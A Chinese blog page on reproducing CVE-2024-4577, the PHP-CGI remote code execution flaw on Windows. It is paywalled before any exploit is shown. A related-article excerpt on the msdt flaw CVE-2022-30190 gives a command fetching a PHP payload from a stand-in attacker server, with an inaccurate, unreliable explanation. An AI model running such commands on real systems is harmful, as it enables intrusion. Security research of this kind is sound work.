PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)

最新推荐文章于 2024-07-31 18:29:30 发布
最新推荐文章于 2024-07-31 18:29:30 发布
阅读量870 收藏 12
点赞数 10
分类专栏: java代码审计 web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/140024675
版权

1 漏洞概述

CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码。

2 漏洞详情

2.1 漏洞描述

漏洞产生的本质原因是Windows系统内字符编码转换的Best-Fit特性。当PHP运行在Windows平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,Windows系统可能会使用“Best-Fit”行为来替换命令行中给Win32 API函数的字符。PHP CGI模块可能会误将这些替换的字符解释为PHP选项,从而允许未经身份验证的攻击者绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。

2.2 影响版本

  • PHP 8.3 < 8.3.8

  • PHP 8.2 < 8.2.20

  • PHP 8.1 < 8.1.29

  • 该漏洞影响安装于Windows系统上的PHP版本。PHP 8.0分支、PHP 7以及PHP 5官方已不再维护。

2.3 影响范围

  • 使用Apache和PHP-CGI在Windows上运行,且系统设置为使用特定代码页(如简体中文、繁体中文、日文)的PHP环境。

3 漏洞复现

3.1 环境搭建

1 xampp下载

<
最低0.47元/天 解锁文章
乐队1
关注
  • 10
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2064
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
漏洞复现CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1439
漏洞复现CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
fly夏天的博客
06-14 1177
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
漏洞复现PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
网络安全从业者的学习笔记
06-10 1570
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577复现
huangyongkang666的博客
06-13 1031
PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的,导致未经身份认证的远程攻击者可以通过特定的字符序列绕过此前CVE-2012-1823的防护,通过参数注入攻击在远程PHP服务器上执行任意代码,从而导致远程代码执行
CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
薛定谔嘚喵博客
06-11 359
PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码
PHP 操作系统命令注入(CVE-2024-4577复现
weixin_51243345的博客
07-17 929
PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577复现
漏洞分析 | PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577
WangsuSecurity的博客
07-05 1090
目前该漏洞的细节已公开,鉴于该漏洞易于利用,且可远程执行命令,建议所有受影响的企业尽快升级修复。
PHP反序列化漏洞CGI远程代码执行漏洞
LCW991207的博客
08-17 577
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。
PHP_CGL远程代码执行漏洞复现CVE-2024-4577(含批量检测脚本)
最新发布
2301_79406077的博客
07-31 213
CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI远程代码执行漏洞漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)。
漏洞复现phpwind v 9.0.2后台getshell
qq_41631806的博客
04-05 3301
漏洞复现phpwind v 9.0.2后台getshell 已知影响版本:v9.0.1,v9.0.2 复现版本:9.0.2 搭建环境:phpstudy2018 步骤: 1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况: 2.打开install.php页面安装好phpwind后登陆后...
CVE-2024-4577PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 1957
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码
CVE-2024-4577-WINDOWS远程代码执行漏洞gelshell
m0_70266827的博客
06-27 899
PHP 在设计时并未充分考虑到 Windows 系统中对字符转换的 "Best-Fit" 特性。当 PHP-CGIPHP 的通用网关接口实现,常用于 Windows 平台Web 服务器)在 Windows 平台上运行时,特别是在使用如中文等语系时,攻击者有可能利用这一特性构造恶意请求。这些恶意请求能够绕过 CVE-2012-1823 补丁的防护措施,导致攻击者可在 PHP 服务器上执行任意 PHP 代码PHP Windows版 8.3.0
phpwind漏洞与修复方
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 489
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新版本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 821
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
PHPWind 获取前台权限漏洞
weixin_33967071的博客
06-02 327
[url]http://www.80sec.com/release/phpwind-exploit.txt[/url]漏洞发布:[url]http://www.80sec.com/[/url]漏洞作者:[email]jianxin@80sec.com[/email]漏洞厂商: [url]http://www.phpwind.com/[/url]PHPWind 论坛系统...
phpwind高危通讯秘钥安全漏洞及修复方案
10-14 493
东方联盟郭盛华/漏洞描述: phpwind9.x 通讯秘钥漏洞可导致前台Getshell。 影响版本: 9.x 漏洞等级: 高危 修复建议: 1、安装官方补丁包:http://www.phpwind.net/read/3709549 2、使用百度云加速WAF防火墙进行防御。 3、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值